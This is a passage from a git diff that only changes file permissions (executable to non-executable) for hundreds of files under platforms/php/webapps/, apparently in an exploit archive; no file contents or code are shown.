b/platforms/php/webapps/5688.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5689.txt b/platforms/php/webapps/5689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5690.txt b/platforms/php/webapps/5690.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5691.php b/platforms/php/webapps/5691.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5693.txt b/platforms/php/webapps/5693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5697.php b/platforms/php/webapps/5697.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5698.txt b/platforms/php/webapps/5698.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5699.txt b/platforms/php/webapps/5699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/570.txt b/platforms/php/webapps/570.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5700.htm b/platforms/php/webapps/5700.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5701.txt b/platforms/php/webapps/5701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5702.txt b/platforms/php/webapps/5702.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5703.txt b/platforms/php/webapps/5703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5704.txt b/platforms/php/webapps/5704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5706.php b/platforms/php/webapps/5706.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5707.txt b/platforms/php/webapps/5707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5708.txt b/platforms/php/webapps/5708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5711.txt b/platforms/php/webapps/5711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5713.txt b/platforms/php/webapps/5713.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5715.txt b/platforms/php/webapps/5715.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5716.txt b/platforms/php/webapps/5716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5722.txt b/platforms/php/webapps/5722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5723.txt b/platforms/php/webapps/5723.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5724.txt b/platforms/php/webapps/5724.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5725.txt b/platforms/php/webapps/5725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5728.txt b/platforms/php/webapps/5728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5729.txt b/platforms/php/webapps/5729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5730.txt b/platforms/php/webapps/5730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5731.txt b/platforms/php/webapps/5731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5733.txt b/platforms/php/webapps/5733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5736.txt b/platforms/php/webapps/5736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5739.txt b/platforms/php/webapps/5739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/574.txt b/platforms/php/webapps/574.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5742.txt b/platforms/php/webapps/5742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5743.txt b/platforms/php/webapps/5743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5744.txt b/platforms/php/webapps/5744.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5745.txt b/platforms/php/webapps/5745.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5748.txt b/platforms/php/webapps/5748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5754.txt b/platforms/php/webapps/5754.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5756.txt b/platforms/php/webapps/5756.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5757.txt b/platforms/php/webapps/5757.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5758.txt b/platforms/php/webapps/5758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5759.txt b/platforms/php/webapps/5759.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5762.txt b/platforms/php/webapps/5762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5764.txt b/platforms/php/webapps/5764.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5766.txt b/platforms/php/webapps/5766.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5767.php b/platforms/php/webapps/5767.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5768.txt b/platforms/php/webapps/5768.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5770.php b/platforms/php/webapps/5770.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5771.txt b/platforms/php/webapps/5771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5772.txt b/platforms/php/webapps/5772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5773.txt b/platforms/php/webapps/5773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5774.txt b/platforms/php/webapps/5774.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5776.txt b/platforms/php/webapps/5776.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5779.txt b/platforms/php/webapps/5779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5782.txt b/platforms/php/webapps/5782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5783.txt b/platforms/php/webapps/5783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5784.txt b/platforms/php/webapps/5784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5785.txt b/platforms/php/webapps/5785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5786.txt b/platforms/php/webapps/5786.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5787.txt b/platforms/php/webapps/5787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5788.txt b/platforms/php/webapps/5788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5791.txt b/platforms/php/webapps/5791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5792.txt b/platforms/php/webapps/5792.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5796.php b/platforms/php/webapps/5796.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5797.txt b/platforms/php/webapps/5797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5801.txt b/platforms/php/webapps/5801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5802.txt b/platforms/php/webapps/5802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5803.txt b/platforms/php/webapps/5803.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5804.txt b/platforms/php/webapps/5804.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5807.txt b/platforms/php/webapps/5807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5808.txt b/platforms/php/webapps/5808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5809.txt b/platforms/php/webapps/5809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5810.txt b/platforms/php/webapps/5810.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5811.txt b/platforms/php/webapps/5811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5812.txt b/platforms/php/webapps/5812.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5813.txt b/platforms/php/webapps/5813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5818.txt b/platforms/php/webapps/5818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5819.txt b/platforms/php/webapps/5819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5820.txt b/platforms/php/webapps/5820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5821.txt b/platforms/php/webapps/5821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5822.txt b/platforms/php/webapps/5822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5823.txt b/platforms/php/webapps/5823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5824.txt b/platforms/php/webapps/5824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5828.txt b/platforms/php/webapps/5828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5829.txt b/platforms/php/webapps/5829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5830.txt b/platforms/php/webapps/5830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5831.txt b/platforms/php/webapps/5831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5833.txt b/platforms/php/webapps/5833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5835.txt b/platforms/php/webapps/5835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5836.txt b/platforms/php/webapps/5836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5838.txt b/platforms/php/webapps/5838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5839.txt b/platforms/php/webapps/5839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5840.txt b/platforms/php/webapps/5840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5841.txt b/platforms/php/webapps/5841.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5842.txt b/platforms/php/webapps/5842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5844.php b/platforms/php/webapps/5844.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5845.txt b/platforms/php/webapps/5845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5846.txt b/platforms/php/webapps/5846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5847.txt b/platforms/php/webapps/5847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5848.txt b/platforms/php/webapps/5848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5852.txt b/platforms/php/webapps/5852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5853.txt b/platforms/php/webapps/5853.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5854.txt b/platforms/php/webapps/5854.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5855.txt b/platforms/php/webapps/5855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5856.txt b/platforms/php/webapps/5856.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5857.txt b/platforms/php/webapps/5857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5858.txt b/platforms/php/webapps/5858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5859.txt b/platforms/php/webapps/5859.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5860.txt b/platforms/php/webapps/5860.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5861.txt b/platforms/php/webapps/5861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5862.txt b/platforms/php/webapps/5862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5863.txt b/platforms/php/webapps/5863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5864.txt b/platforms/php/webapps/5864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5865.txt b/platforms/php/webapps/5865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5866.txt b/platforms/php/webapps/5866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5867.txt b/platforms/php/webapps/5867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5868.txt b/platforms/php/webapps/5868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5870.txt b/platforms/php/webapps/5870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5871.txt b/platforms/php/webapps/5871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5872.txt b/platforms/php/webapps/5872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5873.txt b/platforms/php/webapps/5873.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5874.txt b/platforms/php/webapps/5874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5875.txt b/platforms/php/webapps/5875.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5876.txt b/platforms/php/webapps/5876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5877.txt b/platforms/php/webapps/5877.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5878.txt b/platforms/php/webapps/5878.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5879.txt b/platforms/php/webapps/5879.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5880.txt b/platforms/php/webapps/5880.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5881.txt b/platforms/php/webapps/5881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5882.txt b/platforms/php/webapps/5882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5883.txt b/platforms/php/webapps/5883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5884.txt b/platforms/php/webapps/5884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5888.txt b/platforms/php/webapps/5888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5889.txt b/platforms/php/webapps/5889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5890.txt b/platforms/php/webapps/5890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5892.txt b/platforms/php/webapps/5892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5893.txt b/platforms/php/webapps/5893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5895.txt b/platforms/php/webapps/5895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5896.txt b/platforms/php/webapps/5896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5897.txt b/platforms/php/webapps/5897.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5899.txt b/platforms/php/webapps/5899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5900.txt b/platforms/php/webapps/5900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5901.txt b/platforms/php/webapps/5901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5902.txt b/platforms/php/webapps/5902.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5903.txt b/platforms/php/webapps/5903.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5904.txt b/platforms/php/webapps/5904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5905.txt b/platforms/php/webapps/5905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5906.txt b/platforms/php/webapps/5906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5908.txt b/platforms/php/webapps/5908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5910.txt b/platforms/php/webapps/5910.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5911.txt b/platforms/php/webapps/5911.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5913.txt b/platforms/php/webapps/5913.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5914.txt b/platforms/php/webapps/5914.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5915.txt b/platforms/php/webapps/5915.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5916.txt b/platforms/php/webapps/5916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5917.txt b/platforms/php/webapps/5917.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5919.txt b/platforms/php/webapps/5919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5920.txt b/platforms/php/webapps/5920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5921.txt b/platforms/php/webapps/5921.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5922.php b/platforms/php/webapps/5922.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5924.txt b/platforms/php/webapps/5924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5925.txt b/platforms/php/webapps/5925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5928.txt b/platforms/php/webapps/5928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5929.txt b/platforms/php/webapps/5929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5930.txt b/platforms/php/webapps/5930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5932.txt b/platforms/php/webapps/5932.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5933.txt b/platforms/php/webapps/5933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5934.txt b/platforms/php/webapps/5934.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5936.txt b/platforms/php/webapps/5936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5937.txt b/platforms/php/webapps/5937.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5938.php b/platforms/php/webapps/5938.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5939.txt b/platforms/php/webapps/5939.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5940.txt b/platforms/php/webapps/5940.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5941.txt b/platforms/php/webapps/5941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5942.txt b/platforms/php/webapps/5942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5944.txt b/platforms/php/webapps/5944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5945.txt b/platforms/php/webapps/5945.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5946.txt b/platforms/php/webapps/5946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5947.txt b/platforms/php/webapps/5947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5948.txt b/platforms/php/webapps/5948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5949.txt b/platforms/php/webapps/5949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5950.txt b/platforms/php/webapps/5950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5952.txt b/platforms/php/webapps/5952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5954.txt b/platforms/php/webapps/5954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5955.txt b/platforms/php/webapps/5955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5956.txt b/platforms/php/webapps/5956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5957.txt b/platforms/php/webapps/5957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5958.txt b/platforms/php/webapps/5958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5959.txt b/platforms/php/webapps/5959.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5960.txt b/platforms/php/webapps/5960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5961.txt b/platforms/php/webapps/5961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5962.txt b/platforms/php/webapps/5962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5963.txt b/platforms/php/webapps/5963.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5964.txt b/platforms/php/webapps/5964.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5965.txt b/platforms/php/webapps/5965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5967.txt b/platforms/php/webapps/5967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5969.txt b/platforms/php/webapps/5969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5970.txt b/platforms/php/webapps/5970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5972.txt b/platforms/php/webapps/5972.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5973.php b/platforms/php/webapps/5973.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5974.txt b/platforms/php/webapps/5974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5975.txt b/platforms/php/webapps/5975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5977.txt b/platforms/php/webapps/5977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5980.txt b/platforms/php/webapps/5980.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5981.txt b/platforms/php/webapps/5981.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5982.txt b/platforms/php/webapps/5982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5983.txt b/platforms/php/webapps/5983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5984.txt b/platforms/php/webapps/5984.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5985.txt b/platforms/php/webapps/5985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5986.php b/platforms/php/webapps/5986.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5987.txt b/platforms/php/webapps/5987.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5988.txt b/platforms/php/webapps/5988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5989.txt b/platforms/php/webapps/5989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5990.txt b/platforms/php/webapps/5990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5991.txt b/platforms/php/webapps/5991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5992.txt b/platforms/php/webapps/5992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5993.txt b/platforms/php/webapps/5993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5996.txt b/platforms/php/webapps/5996.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5998.txt b/platforms/php/webapps/5998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5999.txt b/platforms/php/webapps/5999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6.php b/platforms/php/webapps/6.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6000.txt b/platforms/php/webapps/6000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6001.txt b/platforms/php/webapps/6001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6003.txt b/platforms/php/webapps/6003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6005.php b/platforms/php/webapps/6005.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6006.php b/platforms/php/webapps/6006.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6007.txt b/platforms/php/webapps/6007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6008.php b/platforms/php/webapps/6008.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6010.txt b/platforms/php/webapps/6010.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6011.txt b/platforms/php/webapps/6011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6014.txt b/platforms/php/webapps/6014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6015.txt b/platforms/php/webapps/6015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6021.txt b/platforms/php/webapps/6021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6022.txt b/platforms/php/webapps/6022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6024.txt b/platforms/php/webapps/6024.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6025.txt b/platforms/php/webapps/6025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6027.txt b/platforms/php/webapps/6027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6028.txt b/platforms/php/webapps/6028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6034.txt b/platforms/php/webapps/6034.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6035.txt b/platforms/php/webapps/6035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6036.txt b/platforms/php/webapps/6036.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6037.txt b/platforms/php/webapps/6037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6040.txt b/platforms/php/webapps/6040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6041.txt b/platforms/php/webapps/6041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6042.txt b/platforms/php/webapps/6042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6044.txt b/platforms/php/webapps/6044.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6047.txt b/platforms/php/webapps/6047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6048.txt b/platforms/php/webapps/6048.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6049.txt b/platforms/php/webapps/6049.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6050.txt b/platforms/php/webapps/6050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6051.txt b/platforms/php/webapps/6051.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6053.php b/platforms/php/webapps/6053.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6056.txt b/platforms/php/webapps/6056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6057.txt b/platforms/php/webapps/6057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6058.txt b/platforms/php/webapps/6058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6060.php b/platforms/php/webapps/6060.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6061.txt b/platforms/php/webapps/6061.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6062.txt b/platforms/php/webapps/6062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6063.txt b/platforms/php/webapps/6063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6064.txt b/platforms/php/webapps/6064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6065.txt b/platforms/php/webapps/6065.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6066.txt b/platforms/php/webapps/6066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6068.txt b/platforms/php/webapps/6068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6069.txt b/platforms/php/webapps/6069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6070.php b/platforms/php/webapps/6070.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6071.txt b/platforms/php/webapps/6071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6073.txt b/platforms/php/webapps/6073.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6074.txt b/platforms/php/webapps/6074.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6075.txt b/platforms/php/webapps/6075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6076.txt b/platforms/php/webapps/6076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6078.txt b/platforms/php/webapps/6078.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6079.txt b/platforms/php/webapps/6079.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6080.txt b/platforms/php/webapps/6080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6081.txt b/platforms/php/webapps/6081.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6082.txt b/platforms/php/webapps/6082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6084.txt b/platforms/php/webapps/6084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6086.txt b/platforms/php/webapps/6086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6087.txt b/platforms/php/webapps/6087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6088.txt b/platforms/php/webapps/6088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6091.txt b/platforms/php/webapps/6091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6092.txt b/platforms/php/webapps/6092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6096.txt b/platforms/php/webapps/6096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6097.txt b/platforms/php/webapps/6097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6098.txt b/platforms/php/webapps/6098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6099.txt b/platforms/php/webapps/6099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6102.txt b/platforms/php/webapps/6102.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6107.txt b/platforms/php/webapps/6107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6112.txt b/platforms/php/webapps/6112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/6114.txt 